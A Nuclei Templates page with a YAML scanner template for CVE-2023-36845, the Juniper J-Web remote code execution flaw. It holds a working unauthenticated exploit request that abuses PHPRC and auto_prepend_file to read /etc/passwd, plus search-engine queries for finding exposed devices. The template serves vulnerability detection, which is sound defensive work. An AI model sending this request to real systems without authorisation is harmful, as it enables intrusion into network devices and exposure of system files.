Skip to content
Nuclei Templates

Juniper J-Web - Remote Code Execution

ID: CVE-2023-36845

Severity: critical

Author: yaser_s

Tags: cve,cve2023,packetstorm,rce,unauth,juniper,kev

Description

Section titled “Description”

A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables to execute remote commands

YAML Source

Section titled “YAML Source”
id: CVE-2023-36845


info:
  name: Juniper J-Web - Remote Code Execution
  author: yaser_s
  severity: critical
  description: |
    A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables to execute remote commands
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device.
  reference:
    - https://vulncheck.com/blog/juniper-cve-2023-36845
    - https://nvd.nist.gov/vuln/detail/CVE-2023-36845
    - https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/
    - http://packetstormsecurity.com/files/174865/Juniper-SRX-Firewall-EX-Switch-Remote-Code-Execution.html
    - https://supportportal.juniper.net/JSA72300
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-36845
    cwe-id: CWE-473
    epss-score: 0.96663
    epss-percentile: 0.99636
    cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: juniper
    product: junos
    shodan-query:
      - title:"Juniper Web Device Manager"
      - http.title:"juniper web device manager"
    fofa-query: title="juniper web device manager"
    google-query: intitle:"juniper web device manager"
  tags: cve,cve2023,packetstorm,rce,unauth,juniper,kev


http:
  - raw:
      - |
        POST /?PHPRC=/dev/fd/0 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        auto_prepend_file="/etc/passwd"


    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"


      - type: word
        part: body
        words:
          - "Juniper"


      - type: status
        status:
          - 200
# digest: 490a0046304402200e3d2523a6555e2516390de8929c0d7c68bc8df38d40827bd13e05b8a7ea7b5902204bc0b56e53d3fdcdf05cbe2090bb8d8488051cda63d1db73f0de175991f625b2:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-36845.yaml"

View on Github